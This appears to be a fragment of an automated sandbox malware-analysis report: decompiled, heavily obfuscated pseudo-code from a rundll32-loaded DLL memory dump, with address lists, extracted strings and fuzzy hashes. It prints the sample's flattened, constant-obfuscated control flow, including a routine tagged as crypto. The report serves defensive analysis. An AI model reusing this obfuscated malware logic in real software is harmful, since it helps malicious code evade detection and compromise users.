				_v1800 = _v1800 ^ 0xc292eb29;
				_v1720 = 0x4d0b;
				_v1720 = _v1720 << 7;
				_v1720 = _v1720 + 0x277b;
				_v1720 = _v1720 ^ 0x00268d74;
				_v1768 = 0x75cf;
				_v1768 = _v1768 * 0x62;
				_v1768 = _v1768 + 0x1332;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 ^ 0x00000ed4;
				_v1692 = 0xd85d;
				_v1692 = _v1692 + 0xd2aa;
				_v1692 = _v1692 ^ 0x0001f663;
				_v1788 = 0xbc3e;
				_v1788 = _v1788 | 0x282d42cc;
				_v1788 = _v1788 + 0xffffb4b2;
				_v1788 = _v1788 * 0x25;
				_v1788 = _v1788 ^ 0xce9a942b;
				_v1796 = 0x301;
				_v1796 = _v1796 ^ 0x0ec358c8;
				_v1796 = _v1796 / _t471;
				_v1796 = _v1796 + 0xffff6806;
				_v1796 = _v1796 ^ 0x00a3cb1c;
				_v1656 = 0xf49e;
				_v1656 = _v1656 + 0xffffddef;
				_v1656 = _v1656 ^ 0x0000aa95;
				_v1728 = 0xf403;
				_v1728 = _v1728 + 0x6a8e;
				_v1728 = _v1728 << 6;
				_v1728 = _v1728 ^ 0x0057d552;
				_v1756 = 0x4f4e;
				_v1756 = _v1756 + 0xffff0830;
				_v1756 = _v1756 | 0xfc8d1ff5;
				_v1756 = _v1756 >> 0xb;
				_v1756 = _v1756 ^ 0x001fca39;
				_v1680 = 0x60;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0x00002a5b;
				_v1688 = 0xc18a;
				_v1688 = _v1688 ^ 0xc8271709;
				_v1688 = _v1688 ^ 0xc827be32;
				_v1704 = 0xf8b0;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x003e063b;
				_v1772 = 0x7a1e;
				_v1772 = _v1772 ^ 0xc6946529;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 << 2;
				_v1772 = _v1772 ^ 0xa507b562;
				_v1744 = 0xe662;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 | 0x81d50607;
				_v1744 = _v1744 ^ 0x81d55403;
				_v1716 = 0x2f94;
				_v1716 = _v1716 / _t468;
				_t472 = 0x2c;
				_v1716 = _v1716 / _t472;
				_v1716 = _v1716 ^ 0x00000a71;
				_v1648 = 0xc69;
				_v1648 = _v1648 + 0x3b27;
				_v1648 = _v1648 ^ 0x00004de4;
				_v1732 = 0x30eb;
				_v1732 = _v1732 | 0x980f1189;
				_t473 = 0x7e;
				_v1732 = _v1732 * 0x3d;
				_v1732 = _v1732 ^ 0x3b9ecce7;
				_v1684 = 0xb64c;
				_v1684 = _v1684 ^ 0x315bc1c3;
				_v1684 = _v1684 ^ 0x315b57c4;
				_v1724 = 0x6411;
				_v1724 = _v1724 | 0xfbcd3fff;
				_v1724 = _v1724 ^ 0xfbcd5420;
				_v1764 = 0xfef7;
				_v1764 = _v1764 >> 0xf;
				_v1764 = _v1764 ^ 0xb299bfc4;
				_v1764 = _v1764 | 0x06f7c44b;
				_v1764 = _v1764 ^ 0xb6ffeafa;
				_v1676 = 0x7f53;
				_v1676 = _v1676 ^ 0x68612cf3;
				_v1676 = _v1676 ^ 0x68615bca;
				_v1736 = 0xced2;
				_v1736 = _v1736 / _t473;
				_t474 = 0x45;
				_v1736 = _v1736 / _t474;
				_v1736 = _v1736 ^ 0x00002bb2;
				_v1748 = 0xc83d;
				_v1748 = _v1748 | 0xac12259f;
				_v1748 = _v1748 + 0xffff4283;
				_v1748 = _v1748 ^ 0xac12199f;
				_v1696 = 0xff80;
				_t475 = 0x51;
				_v1696 = _v1696 / _t475;
				_v1696 = _v1696 ^ 0x0000122c;
				_v1700 = 0x5074;
				_v1700 = _v1700 + 0xffffb5cd;
				_v1700 = _v1700 ^ 0x0000626a;
				_v1668 = 0xce62;
				_t476 = 0x5d;
				_v1668 = _v1668 / _t476;
				_v1668 = _v1668 ^ 0x00006436;
				_v1652 = 0x16bc;
				_v1652 = _v1652 << 3;
				_v1652 = _v1652 ^ 0x0000d776;
				_v1664 = 0x5160;
				_v1664 = _v1664 + 0xffff7d7f;
				_v1664 = _v1664 ^ 0xfffff234;
				_v1776 = 0x2bb0;
				_v1776 = _v1776 ^ 0xda170107;
				_v1776 = _v1776 >> 9;
				_v1776 = _v1776 >> 0xa;
				_v1776 = _v1776 ^ 0x00006842;
				_v1660 = 0xed5a;
				_t477 = 0x4f;
				_v1660 = _v1660 / _t477;
				_v1660 = _v1660 ^ 0x00003872;
				_v1708 = 0x88f4;
				_v1708 = _v1708 + 0x1364;
				_v1708 = _v1708 ^ 0x00009651;
				_v1712 = 0x6359;
				_v1712 = _v1712 ^ 0x0adc469b;
				_t469 = _v1708;
				_v1712 = _v1712 * 0x12;
				_v1712 = _v1712 ^ 0xc37acb18;
				_v1672 = 0x7869;
				_v1672 = _v1672 * 0x31;
				_v1672 = _v1672 ^ 0x001774dc;
				_v1752 = 0x2ad2;
				_v1752 = _v1752 + 0x99c0;
				_v1752 = _v1752 + 0xffff4378;
				_v1752 = _v1752 ^ 0x00000634;
				while(1) {
					_t457 = 0x2e;
					L2:
					while(_t416 != 0x34b2b71) {
						if(_t416 == 0x5071dc9) {
							__eflags = _v1636 & _v1780;
							if(__eflags == 0) {
								_t403 = _a16( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t420 =  ~_t403 & 0x01e56524;
								L9:
								_t416 = _t420 + 0x36fd2c93;
								while(1) {
									_t457 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t457;
							if(_v1592 != _t457) {
								L18:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(0x100015c0);
									_push(_v1744);
									_t410 = E1001BF25(_v1704, _v1772, __eflags);
									_pop(_t423);
									E100163BF(_t410, __eflags, _v1648, _v1732,  &_v524, _t423, _v1684, _t480,  &_v1592, _v1724);
									E10004EA1( &_v524, _v1764, _v1676, _v1736, _a12, _a16, _v1748, _a24);
									_t407 = E1001C5F7(_v1696, _v1700, _v1668, _v1652, _t410);
									_t482 =  &(_t482[0x11]);
									_t457 = 0x2e;
								}
								L17:
								_t416 = 0x38e291b7;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v1590 - _t457;
							if(_v1590 != _t457) {
								goto L18;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t416 == 0x14043b9b) {
							_push(0x100015b0);
							_push(_v1792);
							_t404 = E1001BF25(_v1784, _v1760, __eflags);
							_pop(_t429);
							E10013D3D(_t404, __eflags, _v1740, _v1800,  &_v1044, _v1720, _t429, _v1768);
							_t407 = E1001C5F7(_v1692, _v1788, _v1796, _v1656, _t404);
							_t482 =  &(_t482[9]);
							_t416 = 0x34b2b71;
							while(1) {
								_t457 = 0x2e;
								goto L2;
							}
						}
						if(_t416 == 0x363f5361) {
							_t416 = 0x14043b9b;
							continue;
						}
						if(_t416 == 0x36fd2c93) {
							return E10001EC9(_v1708, _v1712, _t469, _v1672, _v1752);
						}
						if(_t416 != 0x38e291b7) {
							L24:
							__eflags = _t416 - 0x1d1ded50;
							if(__eflags != 0) {
								continue;
							}
							return _t407;
						}
						_t407 = E1001D0A1(_v1664, _t469, _v1776, _v1660,  &_v1636);
						_t482 =  &(_t482[3]);
						asm("sbb ecx, ecx");
						_t420 =  ~_t407 & 0xce09f136;
						goto L9;
					}
					_t400 = E10002577( &_v1044,  &_v1636, _v1728, _v1756, _v1680, _v1688);
					_t469 = _t400;
					_t482 =  &(_t482[4]);
					__eflags = _t400 - 0xffffffff;
					if(__eflags == 0) {
						_t416 = 0x1d1ded50;
						_t457 = 0x2e;
						goto L24;
					}
					_t416 = 0x5071dc9;
				}
			}

0x10004eaa
0x10004eb1
0x10004eb3
0x10004eba
0x10004ec1
0x10004ec8
0x10004ecf
0x10004ed6
0x10004ed7
0x10004ed8
0x10004edd
0x10004ee5
0x10004ee8
0x10004ef5
0x10004efd
0x10004f02
0x10004f0a
0x10004f12
0x10004f1a
0x10004f22
0x10004f2a
0x10004f38
0x10004f3d
0x10004f43
0x10004f4b
0x10004f53
0x10004f5b
0x10004f63
0x10004f6b
0x10004f73
0x10004f80
0x10004f83
0x10004f87
0x10004f8f
0x10004f97
0x10004f9f
0x10004fa7
0x10004fac
0x10004fb4
0x10004fbc
0x10004fca
0x10004fcb
0x10004fcf
0x10004fd7
0x10004fdf
0x10004fe7
0x10004fef
0x10004ff4
0x10004ffc
0x10005004
0x10005011
0x10005015
0x1000501d
0x10005022
0x1000502a
0x10005032
0x1000503a
0x10005042
0x1000504a
0x10005052
0x1000505f
0x10005063
0x1000506b
0x10005073
0x10005085
0x10005089
0x10005091
0x10005099
0x100050a4
0x100050af
0x100050ba
0x100050c2
0x100050ca
0x100050cf
0x100050d7
0x100050df
0x100050e7
0x100050ef
0x100050f4
0x100050fc
0x10005107
0x1000510f
0x1000511a
0x10005122
0x1000512a
0x10005132
0x1000513a
0x1000513f
0x10005147
0x1000514f
0x10005157
0x1000515c
0x10005161
0x10005169
0x10005171
0x10005176
0x1000517e
0x10005186
0x10005196
0x100051a0
0x100051a5
0x100051ab
0x100051b3
0x100051be
0x100051c9
0x100051d4
0x100051dc
0x100051e9
0x100051ec
0x100051f0
0x100051f8
0x10005203
0x1000520e
0x10005219
0x10005221
0x10005229
0x10005231
0x10005239
0x1000523e
0x10005246
0x1000524e
0x10005256
0x10005261
0x1000526c
0x10005277
0x10005287
0x1000528f
0x10005292
0x10005296
0x100052a0
0x100052a8
0x100052b0
0x100052b8
0x100052c0
0x100052ce
0x100052d3
0x100052d9
0x100052e1
0x100052e9
0x100052f1
0x100052f9
0x1000530b
0x10005310
0x10005319
0x10005324
0x1000532f
0x10005337
0x10005342
0x1000534d
0x10005358
0x10005363
0x1000536b
0x10005373
0x10005378
0x1000537d
0x10005385
0x10005397
0x1000539a
0x100053a1
0x100053ac
0x100053b4
0x100053bc
0x100053c4
0x100053cc
0x100053d9
0x100053dd
0x100053e1
0x100053e9
0x100053fc
0x10005403
0x1000540e
0x10005416
0x1000541e
0x10005426
0x1000542e
0x10005430
0x00000000
0x10005431
0x10005443
0x10005519
0x10005520
0x10005624
0x1000562f
0x10005631
0x100054a1
0x100054a1
0x1000542e
0x10005430
0x00000000
0x10005430
0x1000542e
0x10005526
0x1000552e
0x1000555a
0x1000555a
0x10005562
0x10005564
0x10005569
0x10005575
0x1000557b
0x100055af
0x100055e3
0x10005605
0x1000560a
0x1000560f
0x1000560f
0x10005550
0x10005550
0x00000000
0x10005550
0x10005530
0x10005539
0x00000000
0x00000000
0x1000553b
0x10005543
0x00000000
0x00000000
0x10005545
0x1000554e
0x00000000
0x00000000
0x00000000
0x1000554e
0x1000544f
0x100054b0
0x100054b5
0x100054c1
0x100054c7
0x100054e7
0x10005503
0x10005508
0x1000550b
0x1000542e
0x10005430
0x00000000
0x10005430
0x1000542e
0x10005457
0x100054a9
0x00000000
0x100054a9
0x1000545f
0x00000000
0x100056a5
0x1000546b
0x1000567e
0x1000567e
0x10005684
0x00000000
0x00000000
0x00000000
0x10005684
0x1000548d
0x10005492
0x10005499
0x1000549b
0x00000000
0x1000549b
0x1000565d
0x10005662
0x10005664
0x10005667
0x1000566a
0x10005678
0x1000567d
0x00000000
0x1000567d
0x1000566c
0x1000566c

Strings

m, xrefs: 10004FD7
Bh, xrefs: 1000537D
[*, xrefs: 1000510F
{', xrefs: 10004FF4
/T, xrefs: 10004F1A
Yc, xrefs: 100053C4
NO, xrefs: 100050D7
aS?6, xrefs: 10004EFD
aS?6, xrefs: 10005451
b, xrefs: 10005169
6d, xrefs: 10005319
M, xrefs: 100051C9
ix, xrefs: 100053E9
r8, xrefs: 100053A1
0, xrefs: 100051D4
jb, xrefs: 100052F1
I, xrefs: 10004F9F
Z, xrefs: 10005385
Sex;, xrefs: 10004F12

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /T$6d$Bh$NO$Sex;$Yc$Z$[*$aS?6$aS?6$b$ix$jb$m$r8${'$0$I$M
API String ID: 0-4291825950
Opcode ID: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
Instruction ID: 8667d57ab57f633c3b350f9276bfc3316d3d5256110005b5da9373a31fbac2ab
Opcode Fuzzy Hash: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
Instruction Fuzzy Hash: 7712137150C7819FE364CF21C849A9FBBE2FBC4398F10891DE19A862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001E19F, Relevance: 21.7, Strings: 17, Instructions: 470
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001E19F(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* __ecx;
				void* _t451;
				void* _t486;
				signed int _t488;
				intOrPtr _t496;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t535;
				intOrPtr _t573;
				void* _t575;
				signed int* _t587;
				void* _t590;

				_t516 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t451);
				_v16 = 0x624f91;
				_t587 =  &(( &_v220)[4]);
				_v12 = 0x2a04c0;
				_v8 = 0x512f64;
				_t573 = 0;
				_v4 = 0;
				_t575 = 0x21d5185e;
				_v216 = 0xc140;
				_t518 = 0xe;
				_v216 = _v216 / _t518;
				_v216 = _v216 | 0xdbfffb91;
				_v216 = _v216 ^ 0xdbff99d3;
				_v168 = 0x2a5e;
				_v168 = _v168 ^ 0xa3c44280;
				_v168 = _v168 << 9;
				_t519 = 0x26;
				_v168 = _v168 / _t519;
				_v168 = _v168 ^ 0x03993ad3;
				_v192 = 0x18c2;
				_v192 = _v192 ^ 0xd0e63b27;
				_v192 = _v192 ^ 0xef30ec67;
				_t36 =  &_v192; // 0xef30ec67
				_t520 = 0x16;
				_v192 =  *_t36 / _t520;
				_v192 = _v192 ^ 0x02e65ae3;
				_v28 = 0x8b75;
				_t521 = 0x66;
				_v28 = _v28 / _t521;
				_v28 = _v28 ^ 0x0000015f;
				_v116 = 0x1a67;
				_v116 = _v116 ^ 0x4b480ab8;
				_v116 = _v116 + 0xffffe6d8;
				_v116 = _v116 ^ 0x4b47f7f7;
				_v164 = 0xf9a1;
				_v164 = _v164 + 0xce44;
				_t522 = 0x15;
				_v164 = _v164 / _t522;
				_v164 = _v164 * 0x64;
				_v164 = _v164 ^ 0xf0087ab4;
				_v104 = 0x8783;
				_v104 = _v104 >> 9;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x000005ac;
				_v68 = 0xc586;
				_v68 = _v68 * 0x2a;
				_v68 = _v68 ^ 0x00202599;
				_v40 = 0xd110;
				_v40 = _v40 | 0x671d2d67;
				_v40 = _v40 ^ 0x671d8efb;
				_v100 = 0x326d;
				_v100 = _v100 ^ 0xf0f4e5fa;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x3d35bfd9;
				_v48 = 0x7d57;
				_t523 = 0x63;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x0035e190;
				_v156 = 0xbe8d;
				_v156 = _v156 | 0xda6f2624;
				_v156 = _v156 + 0xdae9;
				_v156 = _v156 | 0xe9accc97;
				_v156 = _v156 ^ 0xfbfc818b;
				_v108 = 0xbce1;
				_v108 = _v108 ^ 0x7ee51402;
				_v108 = _v108 + 0xffff7bea;
				_v108 = _v108 ^ 0x7ee5758f;
				_v56 = 0x8521;
				_v56 = _v56 ^ 0x357a7630;
				_v56 = _v56 ^ 0x357a8a2f;
				_v124 = 0x158;
				_v124 = _v124 + 0xffffb1a8;
				_v124 = _v124 | 0x92d6cfda;
				_v124 = _v124 ^ 0xffffc67a;
				_v172 = 0xab3b;
				_v172 = _v172 | 0xe0b1ec5b;
				_v172 = _v172 ^ 0xbad91e0a;
				_v172 = _v172 + 0xa707;
				_v172 = _v172 ^ 0x5a69f167;
				_v96 = 0xed9e;
				_v96 = _v96 + 0x6931;
				_v96 = _v96 ^ 0x00013b1d;
				_v208 = 0xc215;
				_v208 = _v208 + 0xb2e7;
				_v208 = _v208 ^ 0x39f9ff48;
				_v208 = _v208 + 0x9ab9;
				_v208 = _v208 ^ 0x39f93b82;
				_v112 = 0x3498;
				_v112 = _v112 + 0x4bc6;
				_v112 = _v112 / _t523;
				_v112 = _v112 ^ 0x00004366;
				_v220 = 0x48;
				_v220 = _v220 | 0xadbd3685;
				_t524 = 0x25;
				_v220 = _v220 / _t524;
				_v220 = _v220 + 0xbcbb;
				_v220 = _v220 ^ 0x04b294b8;
				_v160 = 0x4d28;
				_v160 = _v160 >> 3;
				_t525 = 0x58;
				_v160 = _v160 * 0xb;
				_v160 = _v160 / _t525;
				_v160 = _v160 ^ 0x00006f26;
				_v60 = 0xbd2;
				_v60 = _v60 + 0xffff7eef;
				_v60 = _v60 ^ 0xffffcc99;
				_v32 = 0x1812;
				_v32 = _v32 + 0xffff0573;
				_v32 = _v32 ^ 0xffff5502;
				_v132 = 0x7f72;
				_t526 = 0x75;
				_v132 = _v132 / _t526;
				_v132 = _v132 + 0xb09c;
				_v132 = _v132 ^ 0x000095d1;
				_v188 = 0x9149;
				_v188 = _v188 | 0xa4dde4e7;
				_v188 = _v188 + 0x1385;
				_v188 = _v188 << 0xe;
				_v188 = _v188 ^ 0x825d3d05;
				_v152 = 0x592e;
				_t527 = 0x28;
				_v152 = _v152 * 0x2c;
				_v152 = _v152 ^ 0x9c2a3110;
				_v152 = _v152 ^ 0x9c255458;
				_v196 = 0x1135;
				_v196 = _v196 + 0xfffff425;
				_v196 = _v196 >> 6;
				_v196 = _v196 ^ 0xbfbf1d5b;
				_v196 = _v196 ^ 0xbfbf60c8;
				_v204 = 0xcc36;
				_v204 = _v204 * 0xe;
				_v204 = _v204 >> 1;
				_v204 = _v204 << 0xa;
				_v204 = _v204 ^ 0x1655baac;
				_v212 = 0xe9d4;
				_v212 = _v212 + 0xffff7206;
				_v212 = _v212 + 0x7a90;
				_v212 = _v212 ^ 0x86b4db23;
				_v212 = _v212 ^ 0x86b43879;
				_v180 = 0xccf3;
				_v180 = _v180 ^ 0xb9c8351b;
				_v180 = _v180 | 0x98038e8f;
				_v180 = _v180 * 0x49;
				_v180 = _v180 ^ 0xfb2bf902;
				_v64 = 0x9efe;
				_v64 = _v64 + 0xfffffaef;
				_v64 = _v64 ^ 0x0000b4c9;
				_v72 = 0xd172;
				_v72 = _v72 | 0x8d5131d7;
				_v72 = _v72 ^ 0x8d51ace7;
				_v120 = 0x59d5;
				_v120 = _v120 + 0xffffff6e;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00005703;
				_v84 = 0xde85;
				_v84 = _v84 ^ 0x89f562d5;
				_v84 = _v84 ^ 0x89f58b7f;
				_v52 = 0x311b;
				_v52 = _v52 << 1;
				_v52 = _v52 ^ 0x00002d97;
				_v184 = 0xdffe;
				_v184 = _v184 ^ 0xc31def80;
				_v184 = _v184 << 1;
				_v184 = _v184 * 0xe;
				_v184 = _v184 ^ 0x573173b9;
				_v144 = 0x2421;
				_v144 = _v144 * 0x7e;
				_v144 = _v144 + 0xffffbdf8;
				_v144 = _v144 ^ 0x0011d9fd;
				_v140 = 0xb5be;
				_v140 = _v140 + 0xffff1138;
				_v140 = _v140 ^ 0xaa88dcf7;
				_v140 = _v140 ^ 0x55773d43;
				_v44 = 0x6427;
				_v44 = _v44 ^ 0x73b6b443;
				_v44 = _v44 ^ 0x73b6c2cf;
				_v76 = 0xab83;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x00003dd9;
				_v176 = 0xa297;
				_v176 = _v176 + 0x40d1;
				_v176 = _v176 / _t527;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x0000189d;
				_v136 = 0x856e;
				_v136 = _v136 << 0xf;
				_v136 = _v136 >> 0x10;
				_v136 = _v136 ^ 0x00004166;
				_v200 = 0x9381;
				_v200 = _v200 << 5;
				_v200 = _v200 + 0xcf90;
				_t528 = 0x3c;
				_v200 = _v200 / _t528;
				_v200 = _v200 ^ 0x000016ff;
				_v80 = 0x8f73;
				_v80 = _v80 + 0xffffab60;
				_v80 = _v80 ^ 0x00004f6d;
				_v88 = 0xa0c7;
				_v88 = _v88 ^ 0xf6585f6c;
				_v88 = _v88 ^ 0xf658d2ca;
				_v148 = 0x53c;
				_v148 = _v148 << 9;
				_v148 = _v148 << 0x10;
				_v148 = _v148 ^ 0x7800710d;
				_v36 = 0x1d9;
				_v36 = _v36 + 0x3c9e;
				_v36 = _v36 ^ 0x00013e77;
				_v92 = 0x5eee;
				_v92 = _v92 + 0xffffe50b;
				_v92 = _v92 ^ 0x000043ea;
				_v128 = 0xff6;
				_v128 = _v128 >> 0xd;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x00000001;
				goto L1;
				do {
					while(1) {
						L1:
						_t590 = _t575 - 0x21d5185e;
						if(_t590 > 0) {
							break;
						}
						if(_t590 == 0) {
							_t535 = 0x2c;
							_t496 = E100157E8(_t535);
							 *0x100221b4 = _t496;
							_t528 = _t528;
							if(_t496 != 0) {
								_t575 = 0x235d3418;
								continue;
							}
						} else {
							if(_t575 == 0x1d010d0) {
								_t528 = _v44;
								_t501 = E10008F73(_t528, _v76,  *((intOrPtr*)( *0x100221b4 + 4)), _t528, _v176, _v136, _t528, _v200, _v168,  *0x100221b4 + 0x10);
								_t587 =  &(_t587[8]);
								if(_t501 != 0) {
									_t573 = 1;
								} else {
									_t575 = 0x2ad17601;
									continue;
								}
							} else {
								if(_t575 == 0x2a7485f) {
									_push(_t528);
									E10008A8C( *((intOrPtr*)( *0x100221b4 + 4)));
									_t528 = _t528;
									_t575 = 0xea2ab84;
									continue;
								} else {
									if(_t575 == 0x6da30e1) {
										_push(_t528);
										E1000AC80( *((intOrPtr*)( *0x100221b4 + 0x14)));
										_t528 = _t528;
										_t575 = 0x2a7485f;
										continue;
									} else {
										if(_t575 == 0xea2ab84) {
											E100091CD(_v40, _v100, _v48,  *0x100221b4, _v156);
										} else {
											if(_t575 != 0x16122494) {
												goto L25;
											} else {
												_push(_t528);
												_t528 = _v184;
												_t511 = E1000AB96(_t528, _v144, _v216, _v140, _v28,  *((intOrPtr*)( *0x100221b4 + 4)));
												_t587 =  &(_t587[5]);
												asm("sbb esi, esi");
												_t575 = ( ~_t511 & 0xfaf5dfef) + 0x6da30e1;
												continue;
											}
										}
									}
								}
							}
						}
						L29:
						return _t573;
					}
					if(_t575 == 0x235d3418) {
						_push(_t528);
						_t528 = _v164 | _v116;
						_t486 = E10003BCD(_t528, _v108, _v56, _v124, _t528, _v172, _t528,  *0x100221b4 + 4);
						_t587 =  &(_t587[7]);
						if(_t486 == 0) {
							_t575 = 0xea2ab84;
							goto L25;
						} else {
							_t575 = 0x2b13f55e;
							goto L1;
						}
					} else {
						if(_t575 == 0x261556b7) {
							_t488 = E10007A59(_v132, _v188, _v24,  *0x100221b4, _v20,  *((intOrPtr*)( *0x100221b4 + 4)),  *0x100221b4 + 0x14, _v152, _v196, _t528, _v204, _v212);
							_t528 = _v180;
							asm("sbb esi, esi");
							_t575 = ( ~_t488 & 0x136adc35) + 0x2a7485f;
							E10007BE0(_t528, _v24, _v64, _v72);
							_t587 =  &(_t587[0xc]);
							goto L25;
						} else {
							if(_t575 == 0x2ad17601) {
								_push(_t528);
								E1000AC80( *((intOrPtr*)( *0x100221b4)));
								_t528 = _t528;
								_t575 = 0x6da30e1;
								goto L1;
							} else {
								if(_t575 != 0x2b13f55e) {
									goto L25;
								} else {
									_push(_t528);
									_t528 =  &_v20;
									_t515 = E1000CC2A(_t528, _v92,  *_t516, _v112, _v220, _v160, _v128 | _v36,  &_v24, _v60,  *((intOrPtr*)(_t516 + 4)), _v32, _v192);
									_t587 =  &(_t587[0xb]);
									asm("sbb esi, esi");
									_t575 = ( ~_t515 & 0x236e0e58) + 0x2a7485f;
									goto L1;
								}
							}
						}
					}
					goto L29;
					L25:
				} while (_t575 != 0x1e355eb8);
				goto L29;
			}

0x1001e1a6
0x1001e1b0
0x1001e1b1
0x1001e1b8
0x1001e1ba
0x1001e1bf
0x1001e1ca
0x1001e1cd
0x1001e1da
0x1001e1e5
0x1001e1e7
0x1001e1ee
0x1001e1f3
0x1001e201
0x1001e206
0x1001e20c
0x1001e214
0x1001e21c
0x1001e224
0x1001e22c
0x1001e235
0x1001e23a
0x1001e240
0x1001e248
0x1001e250
0x1001e258
0x1001e260
0x1001e264
0x1001e269
0x1001e26f
0x1001e277
0x1001e289
0x1001e28e
0x1001e297
0x1001e2a2
0x1001e2aa
0x1001e2b2
0x1001e2ba
0x1001e2c2
0x1001e2ca
0x1001e2d6
0x1001e2d9
0x1001e2e2
0x1001e2e6
0x1001e2ee
0x1001e2f9
0x1001e301
0x1001e309
0x1001e314
0x1001e327
0x1001e32e
0x1001e339
0x1001e344
0x1001e34f
0x1001e35a
0x1001e365
0x1001e372
0x1001e37a
0x1001e385
0x1001e39a
0x1001e39d
0x1001e3a4
0x1001e3af
0x1001e3b7
0x1001e3bf
0x1001e3c7
0x1001e3cf
0x1001e3d7
0x1001e3e2
0x1001e3ed
0x1001e3f8
0x1001e403
0x1001e40e
0x1001e419
0x1001e424
0x1001e42c
0x1001e434
0x1001e43c
0x1001e444
0x1001e44c
0x1001e454
0x1001e45c
0x1001e464
0x1001e46c
0x1001e477
0x1001e482
0x1001e48d
0x1001e495
0x1001e49d
0x1001e4a5
0x1001e4ad
0x1001e4b5
0x1001e4c0
0x1001e4d6
0x1001e4dd
0x1001e4e8
0x1001e4f0
0x1001e4fc
0x1001e501
0x1001e507
0x1001e50f
0x1001e517
0x1001e51f
0x1001e529
0x1001e52c
0x1001e538
0x1001e53c
0x1001e544
0x1001e54f
0x1001e55a
0x1001e565
0x1001e570
0x1001e57b
0x1001e586
0x1001e592
0x1001e595
0x1001e599
0x1001e5a1
0x1001e5a9
0x1001e5b3
0x1001e5bb
0x1001e5c3
0x1001e5c8
0x1001e5d0
0x1001e5df
0x1001e5e0
0x1001e5e4
0x1001e5ec
0x1001e5f4
0x1001e5fc
0x1001e604
0x1001e609
0x1001e611
0x1001e619
0x1001e626
0x1001e62a
0x1001e62e
0x1001e633
0x1001e63b
0x1001e643
0x1001e64b
0x1001e653
0x1001e65b
0x1001e663
0x1001e66b
0x1001e673
0x1001e680
0x1001e684
0x1001e68c
0x1001e697
0x1001e6a2
0x1001e6ad
0x1001e6b8
0x1001e6c3
0x1001e6ce
0x1001e6d6
0x1001e6de
0x1001e6e3
0x1001e6eb
0x1001e6f6
0x1001e701
0x1001e70c
0x1001e717
0x1001e71e
0x1001e729
0x1001e731
0x1001e739
0x1001e742
0x1001e746
0x1001e74e
0x1001e75b
0x1001e75f
0x1001e767
0x1001e76f
0x1001e777
0x1001e77f
0x1001e787
0x1001e78f
0x1001e79a
0x1001e7a5
0x1001e7b0
0x1001e7bb
0x1001e7c3
0x1001e7ce
0x1001e7d6
0x1001e7e4
0x1001e7e8
0x1001e7ed
0x1001e7f5
0x1001e7fd
0x1001e802
0x1001e809
0x1001e816
0x1001e81e
0x1001e823
0x1001e831
0x1001e834
0x1001e838
0x1001e840
0x1001e84b
0x1001e856
0x1001e861
0x1001e86c
0x1001e877
0x1001e882
0x1001e88a
0x1001e88f
0x1001e894
0x1001e89c
0x1001e8a7
0x1001e8b2
0x1001e8bd
0x1001e8c8
0x1001e8d3
0x1001e8de
0x1001e8e6
0x1001e8eb
0x1001e8f0
0x1001e8f0
0x1001e8f5
0x1001e8f5
0x1001e8f5
0x1001e8f5
0x1001e8fb
0x00000000
0x00000000
0x1001e901
0x1001ea28
0x1001ea29
0x1001ea2e
0x1001ea33
0x1001ea36
0x1001ea3c
0x00000000
0x1001ea3c
0x1001e907
0x1001e90d
0x1001e9f3
0x1001e9fd
0x1001ea02
0x1001ea07
0x1001ebf8
0x1001ea0d
0x1001ea0d
0x00000000
0x1001ea0d
0x1001e913
0x1001e915
0x1001e9b6
0x1001e9bb
0x1001e9c1
0x1001e9c2
0x00000000
0x1001e91b
0x1001e921
0x1001e98c
0x1001e997
0x1001e99d
